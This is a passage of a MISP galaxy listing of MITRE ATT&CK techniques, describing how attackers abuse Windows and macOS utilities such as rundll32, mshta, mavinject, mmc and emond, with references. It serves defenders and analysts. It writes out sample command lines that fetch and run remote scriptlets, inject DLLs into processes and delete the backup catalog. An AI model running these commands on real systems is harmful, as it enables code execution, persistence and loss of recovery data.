Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)

The tag is: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011"

Table 4016. Table References
Links
https://attack.mitre.org/techniques/T1218/011
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
https://www.attackify.com/blog/rundll32_execution_order/
https://github.com/gtworek/PSBits/tree/master/NoRunDll

Verclsid - T1218.012

Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)

Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running <code>verclsid.exe /S /C {CLSID}</code>, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub)

The tag is: misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012"

Table 4017. Table References
Links
https://attack.mitre.org/techniques/T1218/012
https://www.winosbite.com/verclsid-exe/
https://lolbas-project.github.io/lolbas/Binaries/Verclsid/
https://redcanary.com/blog/verclsid-exe-threat-detection/
https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5

Mavinject - T1218.013

Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)

Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. <code>C:\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL</code>).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe is digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process.

In addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its <code>/HMODULE</code> command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)

The tag is: misp-galaxy:mitre-attack-pattern="Mavinject - T1218.013"

Table 4018. Table References
Links
https://attack.mitre.org/techniques/T1218/013
https://lolbas-project.github.io/lolbas/Binaries/Mavinject/
https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution
https://reaqta.com/2017/12/mavinject-microsoft-injector/
https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e

MMC - T1218.014

Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console, or MMC, is a signed Windows binary and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)

For example, <code>mmc C:\Users\foo\admintools.msc /a</code> will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window.

Adversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)

Adversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\path\to\test.msc</code>.(Citation: abusing_com_reg)

The tag is: misp-galaxy:mitre-attack-pattern="MMC - T1218.014"

Table 4019. Table References
Links
https://attack.mitre.org/techniques/T1218/014
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc
https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console
https://www.ghacks.net/2017/06/10/windows-msc-files-overview/
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog
https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection [https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection ]
https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm
https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/
https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

COR_PROFILER - T1574.012

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)

The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)

Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)

The tag is: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012"

Table 4020. Table References
Links
https://attack.mitre.org/techniques/T1574/012
https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
https://redcanary.com/blog/blue-mockingbird-cryptominer/
https://redcanary.com/blog/cor_profiler-for-persistence/
https://offsec.almond.consulting/UAC-bypass-dotnet.html
https://github.com/OmerYa/Invisi-Shell
https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html

Emond - T1546.014

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.

The tag is: misp-galaxy:mitre-attack-pattern="Emond - T1546.014"

Table 4021. Table References
Links
https://attack.mitre.org/techniques/T1546/014
https://www.xorrior.com/emond-persistence/
http://www.magnusviri.com/Mac/what-is-emond.html
https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Rc.common - T1163

During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.

Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).

The tag is: misp-galaxy:mitre-attack-pattern="Rc.common - T1163"

View relationships graph

Rc.common - T1163 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004" with estimative-language:likelihood-probability="almost-certain"

Table 4022. Table References
Links
https://attack.mitre.org/techniques/T1163
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Regsvcs/Regasm - T1121

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)

Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121"

View relationships graph

Regsvcs/Regasm - T1121 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"

Table 4023. Table References
Links
https://attack.mitre.org/techniques/T1121
https://msdn.microsoft.com/en-us/library/04za0hca.aspx
https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx
https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/
https://lolbas-project.github.io/lolbas/Binaries/Regasm/

Proxy - T1090

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

The tag is: misp-galaxy:mitre-attack-pattern="Proxy - T1090"

Table 4024. Table References
Links
https://attack.mitre.org/techniques/T1090
http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Rootkit - T1014

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)

The tag is: misp-galaxy:mitre-attack-pattern="Rootkit - T1014"

Table 4025. Table References
Links
https://attack.mitre.org/techniques/T1014
https://capec.mitre.org/data/definitions/552.html
https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf
https://en.wikipedia.org/wiki/Rootkit
https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf

Mshta - T1170

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta</code>. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

The tag is: misp-galaxy:mitre-attack-pattern="Mshta - T1170"

View relationships graph

Mshta - T1170 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 4026. Table References
Links
https://attack.mitre.org/techniques/T1170
https://en.wikipedia.org/wiki/HTML_Application
https://msdn.microsoft.com/library/ms536471.aspx
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf
https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html
https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/
https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
https://lolbas-project.github.io/lolbas/Binaries/Mshta/

Screensaver - T1180

Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

<code>SCRNSAVE.exe</code> - set to malicious PE path
<code>ScreenSaveActive</code> - set to '1' to enable the screensaver
<code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock
<code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Screensaver - T1180"

View relationships graph

Screensaver - T1180 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 4027. Table References
Links
https://attack.mitre.org/techniques/T1180
https://en.wikipedia.org/wiki/Screensaver
https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

Rundll32 - T1085

The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.

Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

The tag is: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085"

View relationships graph

Rundll32 - T1085 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 4028. Table References
Links
https://attack.mitre.org/techniques/T1085
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/

Hypervisor - T1062

This technique has been deprecated and should no longer be used.

A type-1 hypervisor is a software layer that sits between the guest operating systems and system’s hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.

The tag is: misp-galaxy:mitre-attack-pattern="Hypervisor - T1062"

Table 4029. Table References
Links
https://attack.mitre.org/techniques/T1062
https://capec.mitre.org/data/definitions/552.html
https://en.wikipedia.org/wiki/Hypervisor
http://en.wikipedia.org/wiki/Xen
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf
http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html

Kerberoasting - T1208

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208"

View relationships graph

Kerberoasting - T1208 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 4030. Table References
Links
https://attack.mitre.org/techniques/T1208
https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
https://msdn.microsoft.com/library/ms677949.aspx
https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
https://redsiege.com/kerberoast-slides
https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
https://adsecurity.org/?p=2293

Masquerading - T1036

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)

The tag is: misp-galaxy:mitre-attack-pattern="Masquerading - T1036"

Table 4031. Table References
Links
https://attack.mitre.org/techniques/T1036
https://capec.mitre.org/data/definitions/177.html
https://lolbas-project.github.io/
http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf
https://twitter.com/ItsReallyNick/status/1055321652777619457

Scripting - T1064

This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Scripting - T1064"

Table 4032. Table References
Links
https://attack.mitre.org/techniques/T1064
http://www.metasploit.com
https://www.veil-framework.com/framework/
https://github.com/mattifestation/PowerSploit
https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/
https://www.uperesia.com/analyzing-malicious-office-documents

Bootkit - T1067

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)

Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

Master Boot Record

The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

Volume Boot Record

The tag is: misp-galaxy:mitre-attack-pattern="Bootkit - T1067"

View relationships graph

Bootkit - T1067 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

Table 4033. Table References
Links
https://attack.mitre.org/techniques/T1067
https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf
http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion

PowerShell - T1086

PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

Administrator permissions are required to use PowerShell to connect to remote systems.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell’s underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell - T1086"

View relationships graph

PowerShell - T1086 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 4034. Table References
Links
https://attack.mitre.org/techniques/T1086
https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx
https://github.com/mattifestation/PowerSploit
https://github.com/jaredhaight/PSAttack
http://www.sixdub.net/?p=367
https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/
https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/
http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

Timestomp - T1099

Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Timestomp - T1099"

View relationships graph

Timestomp - T1099 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 4035. Table References
Links
https://attack.mitre.org/techniques/T1099
http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html

Regsvr32 - T1117

Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)

Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.

Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117"

View relationships graph

Regsvr32 - T1117 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 4036. Table References
Links
https://attack.mitre.org/techniques/T1117
https://support.microsoft.com/en-us/kb/249873
https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/
https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html

InstallUtil - T1118

InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>. InstallUtil.exe is digitally signed by Microsoft.

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)

The tag is: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118"

View relationships graph

InstallUtil - T1118 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"

Table 4037. Table References
Links
https://attack.mitre.org/techniques/T1118
https://msdn.microsoft.com/en-us/library/50614e95.aspx
